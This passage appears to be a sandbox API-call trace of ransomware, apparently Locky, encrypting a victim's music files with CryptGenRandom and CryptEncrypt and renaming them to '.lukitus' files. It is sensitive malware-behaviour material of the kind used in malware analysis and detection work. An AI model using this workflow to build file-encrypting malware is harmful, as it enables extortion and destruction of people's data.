lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-1D8398A0-B0F041BD0889.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-1d8398a0-b0f041bd0889.lukitus"), dwFlags=0x9) returned 1 [0108.360] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.360] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.365] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x9e72, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x9e72, lpOverlapped=0x0) returned 1 [0108.365] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.365] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x9e72, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x9e72, lpOverlapped=0x0) returned 1 [0108.366] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.366] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x649cc010, dwHighDateTime=0x1d31760)) [0108.366] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.366] FlushFileBuffers (hFile=0x328) returned 1 [0108.369] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\LisXqkX_EZX.m4a" (normalized: "c:\\users\\aetadzjz\\music\\lisxqkx_ezx.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bbfbfb0, ftCreationTime.dwHighDateTime=0x1d2f605, ftLastAccessTime.dwLowDateTime=0x138d2320, ftLastAccessTime.dwHighDateTime=0x1d301c8, ftLastWriteTime.dwLowDateTime=0x138d2320, ftLastWriteTime.dwHighDateTime=0x1d301c8, nFileSizeHigh=0x0, nFileSizeLow=0x1e8e)) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.371] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.371] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.371] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.371] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\LisXqkX_EZX.m4a" (normalized: "c:\\users\\aetadzjz\\music\\lisxqkx_ezx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.372] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\LisXqkX_EZX.m4a" (normalized: "c:\\users\\aetadzjz\\music\\lisxqkx_ezx.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-26890357-3E98A81805A4.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-26890357-3e98a81805a4.lukitus"), dwFlags=0x9) returned 1 [0108.373] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.373] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.378] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1e8e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1e8e, lpOverlapped=0x0) returned 1 [0108.378] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.378] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1e8e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1e8e, lpOverlapped=0x0) returned 1 [0108.379] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.379] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x649f2170, dwHighDateTime=0x1d31760)) [0108.379] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.379] FlushFileBuffers (hFile=0x328) returned 1 [0108.382] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\nk-ypDwqGFeK9N.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nk-ypdwqgfek9n.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x339f5e10, ftCreationTime.dwHighDateTime=0x1d2f8bf, ftLastAccessTime.dwLowDateTime=0x66fed180, ftLastAccessTime.dwHighDateTime=0x1d3019f, ftLastWriteTime.dwLowDateTime=0x66fed180, ftLastWriteTime.dwHighDateTime=0x1d3019f, nFileSizeHigh=0x0, nFileSizeLow=0x8fd0)) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.382] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.383] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.383] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.383] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.383] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.383] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.383] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.383] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\nk-ypDwqGFeK9N.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nk-ypdwqgfek9n.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.383] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\nk-ypDwqGFeK9N.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nk-ypdwqgfek9n.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-920974EC-CC3AB8381775.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-920974ec-cc3ab8381775.lukitus"), dwFlags=0x9) returned 1 [0108.385] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.385] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.391] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8fd0, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8fd0, lpOverlapped=0x0) returned 1 [0108.391] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.391] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8fd0, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8fd0, lpOverlapped=0x0) returned 1 [0108.392] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.392] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64a182d0, dwHighDateTime=0x1d31760)) [0108.392] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.392] FlushFileBuffers (hFile=0x328) returned 1 [0108.398] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\NzdrgktZ.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nzdrgktz.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a666bd0, ftCreationTime.dwHighDateTime=0x1d2ff90, ftLastAccessTime.dwLowDateTime=0x493e23c0, ftLastAccessTime.dwHighDateTime=0x1d3052e, ftLastWriteTime.dwLowDateTime=0x493e23c0, ftLastWriteTime.dwHighDateTime=0x1d3052e, nFileSizeHigh=0x0, nFileSizeLow=0xd398)) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.398] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\NzdrgktZ.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nzdrgktz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.399] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\NzdrgktZ.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nzdrgktz.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-2DAADF60-E156096DA44F.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-2daadf60-e156096da44f.lukitus"), dwFlags=0x9) returned 1 [0108.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.400] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.405] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd398, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd398, lpOverlapped=0x0) returned 1 [0108.405] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.406] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd398, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd398, lpOverlapped=0x0) returned 1 [0108.406] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64a3e430, dwHighDateTime=0x1d31760)) [0108.406] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.406] FlushFileBuffers (hFile=0x328) returned 1 [0108.409] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\NzYBBJl9pba5h.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nzybbjl9pba5h.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b1fce0, ftCreationTime.dwHighDateTime=0x1d30088, ftLastAccessTime.dwLowDateTime=0x3d24f140, ftLastAccessTime.dwHighDateTime=0x1d300dd, ftLastWriteTime.dwLowDateTime=0x3d24f140, ftLastWriteTime.dwHighDateTime=0x1d300dd, nFileSizeHigh=0x0, nFileSizeLow=0x10be4)) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.410] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\NzYBBJl9pba5h.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nzybbjl9pba5h.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.410] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\NzYBBJl9pba5h.mp3" (normalized: "c:\\users\\aetadzjz\\music\\nzybbjl9pba5h.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-F0395898-EB4252148408.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-f0395898-eb4252148408.lukitus"), dwFlags=0x9) returned 1 [0108.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.411] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.416] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10be4, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10be4, lpOverlapped=0x0) returned 1 [0108.417] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.417] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10be4, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10be4, lpOverlapped=0x0) returned 1 [0108.417] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64a64590, dwHighDateTime=0x1d31760)) [0108.417] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.418] FlushFileBuffers (hFile=0x328) returned 1 [0108.421] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\28a7m.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\28a7m.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b66df90, ftCreationTime.dwHighDateTime=0x1d2f62c, ftLastAccessTime.dwLowDateTime=0x5d6df890, ftLastAccessTime.dwHighDateTime=0x1d2f861, ftLastWriteTime.dwLowDateTime=0x5d6df890, ftLastWriteTime.dwHighDateTime=0x1d2f861, nFileSizeHigh=0x0, nFileSizeLow=0x137ec)) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: 